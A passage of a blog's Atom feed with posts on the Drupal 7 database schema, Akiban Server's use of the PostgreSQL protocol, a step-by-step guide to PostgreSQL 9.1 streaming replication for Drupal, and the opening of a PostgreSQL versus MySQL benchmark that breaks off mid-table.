&lt;p&gt;Tables that are directly related to &lt;code&gt;node&lt;/code&gt; are &lt;code&gt;node_revision&lt;/code&gt;, &lt;code&gt;node_access&lt;/code&gt;, and &lt;code&gt;node_type&lt;/code&gt;. The &lt;code&gt;node_type&lt;/code&gt; table is in many-to-many relationship with &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;block_node_type&lt;/code&gt;. &lt;code&gt;node_revision&lt;/code&gt; is in a many-to-one relationship with &lt;code&gt;node&lt;/code&gt; as is &lt;code&gt;node_access&lt;/code&gt;. The &lt;code&gt;node_access&lt;/code&gt; table has only 1 row upon initial installation and references a non-existent node. An &lt;a href='http://drupal.org/node/1703222'&gt;issue&lt;/a&gt; has been created to address this.&lt;/p&gt;

&lt;p&gt;The tables directly related to &lt;code&gt;node&lt;/code&gt; and a description of what they do is below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_access&lt;/td&gt;&lt;td&gt;identifies which realm/grant pairs a user must possess in order to view, update, or delete specific nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_revision&lt;/td&gt;&lt;td&gt;stores information about each saved version of a node&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_type&lt;/td&gt;&lt;td&gt;stores information about all defined node types&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='taxonomy_tables'&gt;Taxonomy Tables&lt;/h2&gt;

&lt;p&gt;Four tables in the stock schema are related to taxonomy. These tables are shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/taxonomy_tables.png' alt='Taxonomy tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;First of all, the &lt;code&gt;taxonomy_index&lt;/code&gt; table is in a many-to-many relationship with the &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;taxonomy_term_data&lt;/code&gt; tables. The &lt;code&gt;taxonomy_vocabulary&lt;/code&gt; table has a one-to-many relationship with the &lt;code&gt;taxonomy_term_data&lt;/code&gt; table. The &lt;code&gt;taxonomy_term_data&lt;/code&gt; table in turn has 2 1-to-many relationships with the &lt;code&gt;taxonomy_term_hierarchy&lt;/code&gt; table.&lt;/p&gt;

&lt;p&gt;A description of the taxonomy tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_index&lt;/td&gt;&lt;td&gt;maintains de-normalized information about node/term relationships&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_term_data&lt;/td&gt;&lt;td&gt;stores term information&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_term_hierarchy&lt;/td&gt;&lt;td&gt;stores the hierarchical relationship between terms&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;taxonomy_vocabulary&lt;/td&gt;&lt;td&gt;stores vocabulary information&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='block_tables'&gt;Block Tables&lt;/h2&gt;

&lt;p&gt;The main table in this group is &lt;code&gt;block&lt;/code&gt;. It has three directly related tables in one-to-many relationships: &lt;code&gt;block_node_type&lt;/code&gt;, &lt;code&gt;block_role&lt;/code&gt;, and &lt;code&gt;block_custom&lt;/code&gt;.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/blocks_tables.png' alt='Blocks tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;A description of the blocks tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;blocks&lt;/td&gt;&lt;td&gt;stores block settings&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_custom&lt;/td&gt;&lt;td&gt;stores the contents of custom-made blocks&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_node_type&lt;/td&gt;&lt;td&gt;stores information that sets up display criteria for blocks based on content type&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;block_role&lt;/td&gt;&lt;td&gt;stores access permissions for blocks based on user roles&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h2 id='search_tables'&gt;Search Tables&lt;/h2&gt;

&lt;p&gt;The relationships for the search tables I am a little unsure of. I believe they are as shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/search_tables.png' alt='Search tables.' /&gt;
&lt;/div&gt;
&lt;p&gt;The relationship I&amp;#8217;m most unsure of here are between &lt;code&gt;search_total&lt;/code&gt; and &lt;code&gt;search_index&lt;/code&gt;. I don&amp;#8217;t think the one-to-many relationship I have in place from &lt;code&gt;search_total&lt;/code&gt; to &lt;code&gt;search_index&lt;/code&gt; is correct.&lt;/p&gt;

&lt;p&gt;A description of the search tables is given below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_dataset&lt;/td&gt;&lt;td&gt;stores items that will be searched&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_index&lt;/td&gt;&lt;td&gt;stores the search index and associates words, items, and scores&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_node_links&lt;/td&gt;&lt;td&gt;stores items that link to other nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;search_total&lt;/td&gt;&lt;td&gt;stores search totals for words&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;&lt;br /&gt;
&lt;h1 id='tables_that_relate_nodes_to_users'&gt;Tables That Relate Nodes to Users&lt;/h1&gt;

&lt;p&gt;There are three tables in many-to-many relationships between &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;users&lt;/code&gt;:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Table Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;comment&lt;/td&gt;&lt;td&gt;stores comments and associated data&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;history&lt;/td&gt;&lt;td&gt;stores a record of which users have read which nodes&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;node_comment_statistics&lt;/td&gt;&lt;td&gt;maintains statistics of nodes and comments posts to show &lt;b&gt;new&lt;/b&gt; and &lt;b&gt;updated&lt;/b&gt; flags&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The &lt;code&gt;comment&lt;/code&gt; table could be in its own group. I decided against doing that in this ER diagram since I felt like it would have been a table by itself. Logically, I think of it as either being in the &lt;code&gt;users&lt;/code&gt; or &lt;code&gt;node&lt;/code&gt; group.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;node_comment_statistics&lt;/code&gt; does also maintain a relationship with &lt;code&gt;comment&lt;/code&gt;. This is a non-identifying relationship since a node can exist without any comments.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;During this work, I noticed that the column definitions for many foreign key relationships are in-correct which would result in MySQL not allowing these constraints to actually be created. I created an &lt;a href='http://drupal.org/node/1701822'&gt;issue&lt;/a&gt; and patch for this but it turns out Liam Morland is working on &lt;a href='http://drupal.org/node/911352'&gt;using foreign keys&lt;/a&gt; in core and also came across this around the same time as me.&lt;/p&gt;

&lt;p&gt;Other issues I encountered have also been logged by Liam:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the &lt;code&gt;node_access&lt;/code&gt; table references a non-existent node (&lt;a href='http://drupal.org/node/1703222'&gt;relevant issue&lt;/a&gt;)&lt;/li&gt;

&lt;li&gt;a set name exists in &lt;code&gt;shortcut_set&lt;/code&gt; that does not exist in &lt;code&gt;menu_links&lt;/code&gt; (&lt;a href='http://drupal.org/node/1703208'&gt;relevant issue&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I would vote for foreign keys being used in Drupal core for a number of reasons, not least of which foreign keys aid a newcomer when trying to understand the schema installed by Drupal.&lt;/p&gt;

&lt;p&gt;As I mentioned at the beginning of this post, any comments or corrections are very much welcome. I hope this information can prove useful to someone else besides me!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>PostgreSQL Protocol in Akiban Server</title>
   <link href="http://posulliv.github.com/2012/07/23/postgres-akiban"/>
   <updated>2012-07-23T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/07/23/postgres-akiban</id>
   <content type="html">&lt;p&gt;Last week I was at &lt;a href='http://www.oscon.com/oscon2012'&gt;OSCON&lt;/a&gt; with &lt;a href='http://www.akiban.com/'&gt;Akiban&lt;/a&gt; where I did a demo during &lt;a href='http://renormalize.org/'&gt;Ori&amp;#8217;s&lt;/a&gt; &lt;a href='http://www.oscon.com/oscon2012/public/schedule/detail/26439'&gt;talk&lt;/a&gt;. We announced our &lt;a href='http://www.akiban.com/download-akiban-server'&gt;early developer release&lt;/a&gt; at OSCON and it was a lot of fun to be able to show people our product at our booth. It was also satisfying to see users download and try out the product we&amp;#8217;ve been working on. I&amp;#8217;m hoping our &lt;a href='http://launchpad.net/akiban'&gt;source code&lt;/a&gt; will also be made publically available in the near future.&lt;/p&gt;

&lt;p&gt;One of the common questions we got during the conference was why we implemented the PostgreSQL protocol. Some people were also confused thinking that we were a fork of PostgreSQL due to this. Akiban Server is a completely independent database server we&amp;#8217;ve built from the ground up and when it came time to decide on a communication protocol, we decided that the PostgreSQL protocol was the best choice.&lt;/p&gt;

&lt;p&gt;The main reasons we chose the PostgreSQL protocol are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the protocol is pretty simple and well &lt;a href='http://www.postgresql.org/docs/9.1/static/protocol.html'&gt;documented&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;many clients exist for PostgreSQL and can be re-used with Akiban (this means we do not have to spend a lot of time on client drivers)&lt;/li&gt;

&lt;li&gt;the PostgreSQL command line tool and client library ships with OSX by default now (making playing with our server much easier)&lt;/li&gt;

&lt;li&gt;it supports asynchronous operations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We (really when I say we, I mean &lt;a href='http://www.akiban.com/profile/mike-mcmahon'&gt;Mike&lt;/a&gt;) also implemented support for a number of PostgreSQL system tables in order to support many of the &lt;code&gt;\d&lt;/code&gt; commands in &lt;code&gt;psql&lt;/code&gt; by creating views internally.&lt;/p&gt;

&lt;p&gt;If you are interested in trying it out, I encourage you to download our server and start playing with it. Try using your favorite PostgreSQL tools with it and see if they break. We are very interested in any and all feedback!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Configuring Drupal 7.x With PostgreSQL Replication</title>
   <link href="http://posulliv.github.com/2012/07/08/drupal-postgres-replication"/>
   <updated>2012-07-08T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/07/08/drupal-postgres-replication</id>
   <content type="html">&lt;p&gt;One of the new features in Drupal 7 is that it supports sending queries to a read-only slave database. Since version 9.0, PostgreSQL supports replication natively. In this post, I wanted to cover how to configure replication in PostgreSQL and have Drupal make use of a slave. I will use the master/slave terminology that is common in the MySQL world when referring to the master (primary) and slave (standby) servers in this post.&lt;/p&gt;

&lt;p&gt;First, I installed PostgreSQL 9.1 on my master server along with Drupal 7.12 The steps taken to install and configure Drupal with PostgreSQL 9.1 on my master server are outlined in this &lt;a href='https://gist.github.com/3012400'&gt;gist&lt;/a&gt;. Then I installed PostgreSQL 9.1 on another server that will serve as a slave. My initial setup on the slave was quite simple and only involved a basic install and nothing else. The following commands were all I executed on the slave server to get a base PostgreSQL install:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository ppa:pitti/postgresql&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install postgresql-9.1 libpq-dev postgresql-contrib-9.1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the basic Drupal install was up and running on the master and the slave server has a basic PostgreSQL install, I started on configuring replication. Replication in general is documented in depth in the online PostgreSQL &lt;a href='http://www.postgresql.org/docs/9.1/static/warm-standby.html'&gt;documentation&lt;/a&gt;. In this post, I will be configuring streaming replication which allows a slave server to service read queries.&lt;/p&gt;

&lt;p&gt;The steps that need to be performed to configure streaming replication are (I will cover how to perform each step):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;create a replication user for slaves to connect with&lt;/li&gt;

&lt;li&gt;enable continuous archiving on the master&lt;/li&gt;

&lt;li&gt;configure the master to allow remote connections with the replication user&lt;/li&gt;

&lt;li&gt;take a base backup to be used for setting up a slave&lt;/li&gt;

&lt;li&gt;set up a file-based log-shipping slave&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The first step is to create a user for replication on the master:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo su postgres&lt;/span&gt;
&lt;span class='go'&gt;psql&lt;/span&gt;
&lt;span class='go'&gt;create role repl replication login password &amp;#39;repl&amp;#39;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, the master needs to be have continuous archiving enabled. This is achieved by editing the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file on the master and ensuring the following parameters are set:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;wal_level&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; hot_standby
&lt;span class='nv'&gt;max_wal_senders&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 3 &lt;span class='c'&gt;# limits number of concurrent connections from standby&lt;/span&gt;
&lt;span class='nv'&gt;listen_addresses&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0.0.0.0&amp;#39;&lt;/span&gt;
&lt;span class='nv'&gt;archive_mode&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; on
&lt;span class='nv'&gt;archive_command&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;test ! -f /mnt/postgres/archivedir/%f &amp;amp;&amp;amp; cp %p /mnt/postgres/archivedir/%f&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now to allow remote connections for the replication user, the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file on the master server needs to have an entry like (this assumes the slave server I have configured has the IP address 10.39.111.10):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host  replication   repl 10.39.111.10/32      md5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the above modifications have been mode, we need to restart the PostgreSQL service:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql restart&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The master is now configured. Next we go to the slave server to take a base backup using &lt;a href='http://www.postgresql.org/docs/9.1/static/app-pgbasebackup.html'&gt;&lt;code&gt;pg_basebackup&lt;/code&gt;&lt;/a&gt; along with configuring the slave to use this base backup for its data directory:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql stop&lt;/span&gt;
&lt;span class='go'&gt;sudo mv /var/lib/postgresql/9.1/main/ /var/lib/postgresql/9.1/orig_main&lt;/span&gt;
&lt;span class='go'&gt;sudo su postgres&lt;/span&gt;
&lt;span class='go'&gt;pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h master_server -p 5432 -U repl -W&lt;/span&gt;
&lt;span class='go'&gt;sudo ln -s /etc/ssl/certs/ssl-cert-snakeoil.pem /var/lib/postgresql/9.1/main/server.crt&lt;/span&gt;
&lt;span class='go'&gt;sudo ln -s /etc/ssl/private/ssl-cert-snakeoil.key /var/lib/postgresql/9.1/main/server.key&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;pg_basebackup&lt;/code&gt; command should result in output similar to the following:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$&lt;/span&gt; pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h 10.76.241.129 -p 5432 -U repl -W
&lt;span class='go'&gt;Password: &lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.key&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.crt&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.key&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.crt&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;1403786/1403786 kB (100%), 1/1 tablespace&lt;/span&gt;
&lt;span class='go'&gt;NOTICE:  pg_stop_backup complete, all required WAL segments have been archived&lt;/span&gt;
&lt;span class='gp'&gt;postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we configure the slave to be a hot standby and to allow remote client connections (since Drupal will be connecting to the slave). This is done by editing the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file on the slave to have the following entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;hot_standby&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; on
&lt;span class='nv'&gt;listen_addresses&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0.0.0.0&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To allow the drupal user to connect from the master server (where &lt;code&gt;apache&lt;/code&gt; is running), modify the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file on the slave (assuming 10.76.241.129 is IP address of master):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host  drupal drupal 10.76.241.129/32      md5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, create a &lt;code&gt;recovery.conf&lt;/code&gt; file in the PostgreSQL data directory on the slave server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo touch /var/lib/postgresql/9.1/main/recovery.conf&lt;/span&gt;
&lt;span class='go'&gt;sudo chown postgres:postgres /var/lib/postgresql/9.1/main/recovery.conf&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The following should be placed in the &lt;code&gt;recovery.conf&lt;/code&gt; file (assuming 10.76.241.129 is IP address of master):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;standby_mode&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;on&amp;#39;&lt;/span&gt;
&lt;span class='nv'&gt;primary_conninfo&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;host=10.76.241.129 port=5432 user=repl password=repl&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The PostgreSQL service on the slave server is now ready to be started again:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql start&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If everything worked correctly, log entries indicating replication is running should be present. For example, on my slave server my log file had entries like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;ubuntu@ip-10-39-111-9:/var/log/postgresql$&lt;/span&gt; sudo tail -n 5 /var/log/postgresql/postgresql-9.1-main.log 
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  streaming replication successfully connected to primary&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  incomplete startup packet&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  redo starts at 1/15000020&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  consistent recovery state reached at 1/16000000&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  database system is ready to accept read only connections&lt;/span&gt;
&lt;span class='gp'&gt;ubuntu@ip-10-39-111-9:/var/log/postgresql$&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, Drupal running on the master server is ready to be configured to use a PostgreSQL slave for read-only queries! The &lt;code&gt;settings.php&lt;/code&gt; file for the Drupal site needs to be updated to know about this slave database. My &lt;code&gt;settings.php&lt;/code&gt; file looked like (10.39.111.10 is IP address of slave server):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php5'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;5432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;slave&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;10.39.111.10&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;5432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I would suggest enabling query logging on the slave server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file to have these entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;logging_collector = on&lt;/span&gt;
&lt;span class='go'&gt;log_directory = &amp;#39;pg_log&amp;#39;&lt;/span&gt;
&lt;span class='go'&gt;log_statement = &amp;#39;all&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Query log files will then be generated in the &lt;code&gt;/var/lib/postgresql/9,1/main/pg_log&lt;/code&gt; directory.&lt;/p&gt;

&lt;p&gt;By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to the slave server. The search module can be access from your drupal site by going to &lt;code&gt;http://your.ip.address/drupal/?q=search&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the slave server when issuing content searches.&lt;/p&gt;

&lt;p&gt;That&amp;#8217;s about it for this post. Once replication is configured in PostgreSQL, having Drupal send queries to the slave is pretty straightforward.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Comparing PostgreSQL 9.1 vs. MySQL 5.6 using Drupal 7.x</title>
   <link href="http://posulliv.github.com/2012/06/29/mysql-postgres-bench"/>
   <updated>2012-06-29T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/06/29/mysql-postgres-bench</id>
   <content type="html">&lt;p&gt;Its tough to come across much information about running Drupal on PostgreSQL I find beisdes the basics of installing Drupal on PostgreSQL. In particular, I&amp;#8217;m interested in comparisons of running Drupal on PostgreSQL versus MySQL. Previous posts such as this &lt;a href='http://2bits.com/articles/benchmarking-postgresql-vs-mysql-performance-using-drupal-5x.html'&gt;article&lt;/a&gt; from &lt;a href='http://2bits.com/'&gt;2bits&lt;/a&gt; compares performance of MySQL versus PostgreSQL on Drupal 5.x and seems a bit outdated. This &lt;a href='http://groups.drupal.org/node/61793'&gt;post&lt;/a&gt; from the &lt;a href='http://groups.drupal.org/high-performance'&gt;high performance drupal group&lt;/a&gt; is also pretty dated and has some information with similar comparisons.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to run similar tests to what was done in the &lt;a href='http://2bits.com/articles/benchmarking-postgresql-vs-mysql-performance-using-drupal-5x.html'&gt;article&lt;/a&gt; from 2bits but on a more recent version of Drupal - 7.x. I also wanted to test out a few more complex queries that can get generated by the view module and see how they perform in MySQL versus PostgreSQL.&lt;/p&gt;

&lt;p&gt;For this post, I used the latest GA version of PostgreSQL and for kicks, I went with an aplha release of MySQL - 5.6. I would expect to see similar results for 5.5 in tests like this. I didn&amp;#8217;t use default configurations after installation since I didn&amp;#8217;t see much benefit in testing that. The configurations I used for both systems are documented below.&lt;/p&gt;

&lt;h1 id='environment_setup'&gt;Environment Setup&lt;/h1&gt;

&lt;p&gt;All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by &lt;span&gt;Canonical&lt;/span&gt;. The particular AMI used as the base image for the results gathered in this post was &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-0baf7662'&gt;ami-0baf7662&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Images used were all launched in the US-EAST-1A availability zone and were large instance types. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the &lt;code&gt;my.cnf&lt;/code&gt; file I used for MySQL are outlined in this &lt;a href='https://gist.github.com/2691521'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The PostgreSQL 9.1 setup I performed on a separate instance along with the &lt;code&gt;postgresql.conf&lt;/code&gt; settings I used are outlined in this &lt;a href='https://gist.github.com/3012400'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;APC was installed and its default configuration was used on both servers.&lt;/p&gt;

&lt;h2 id='data_generation'&gt;Data Generation&lt;/h2&gt;

&lt;p&gt;I used &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; and the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; modules to generate data. I generated the following data:&lt;/p&gt;
&lt;table&gt;
  &lt;tr&gt;
    &lt;td&gt;users&lt;/td&gt;&lt;td&gt;50000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
